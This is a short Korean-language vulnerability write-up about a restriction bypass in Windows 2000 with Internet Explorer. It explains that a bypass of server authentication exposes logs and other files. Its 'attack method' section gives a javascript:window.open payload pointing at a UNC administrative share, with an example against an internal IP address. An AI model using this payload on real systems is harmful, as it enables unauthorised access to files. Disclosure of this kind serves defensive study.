윈도2k+IE(Full Patch)에서 Restriction Bypass 공격 :

- 취약점 개요
http://와 같은 방법으로 브라우저상에서 파일을 보기 위한 방법으로 ftp://나 file://, news://와 같은 입력방법이 사용된다.
그러나 인증으로 제한이 가해진 서버에서는 이같은 방법으로 아이디나 비밀번호가 없이ftp:는 서버안의 내용을 볼 수가 없다.

그런데 이것을 우회해서 통과하는 방법이 있어서 보안상의 문제점으로 대두된다.
이 방식을 사용하면 해당 서버내의 로그파일이나 파일을 다운로드 받을 수 있게된다.


- 공격방법
1. 브라우저(IE)를 열고 다음과 같이 입력한다.
javascript:window.open('\\\\\\\\\\\\\\\\\\\\{computer name,or IP, or URL}\\\\{resource, for example D$}')

2. 구체적인 예제는 다음과 같다.
javascript:window.open('\\\\\\\\\\\\\\\\\\\\10.9.9.1\\\\D$')